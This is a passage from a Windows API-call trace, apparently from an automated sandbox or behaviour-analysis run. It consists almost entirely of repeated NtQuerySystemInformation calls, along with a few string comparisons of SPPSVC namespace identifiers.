NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x50, ResultLength=0x0) [0283.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb8, Length=0x50, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0283.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0283.842] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0283.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0283.853] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.862] NtQuerySystemInformation 